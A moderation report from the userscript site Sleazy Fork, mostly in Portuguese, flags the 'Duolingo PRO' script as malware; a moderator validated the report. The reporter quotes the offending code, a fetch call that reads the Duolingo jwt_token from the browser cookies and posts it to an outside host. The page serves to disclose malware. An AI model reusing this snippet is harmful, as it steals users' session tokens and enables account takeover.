Sleazy Fork is available in English.

Duolingo PRO foi denunciado em 23/03/2025 pelo motivo: Malware

O autor da denúncia disse:

This script grabs the JWT token of duolingo and sends it to a fishy link code below:

let apiURL = "https://api.duolingopro.net";

This is the real payload part


            const response = await fetch(apiURL + "/feedback", {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                    'Authorization': `Bearer ${document.cookie.split(';').find(cookie => cookie.includes('jwt_token')).split('=')[1]}`
                },
                body: JSON.stringify(payload)
            });

Este script teve 1 relatório anterior mantido ou corrigido.

anonymoushackerIV (o usuário denunciado) fez as seguintes alterações:

interstellar (o usuário denunciado) fez as seguintes alterações:

Esta denúncia foi validada por um moderador.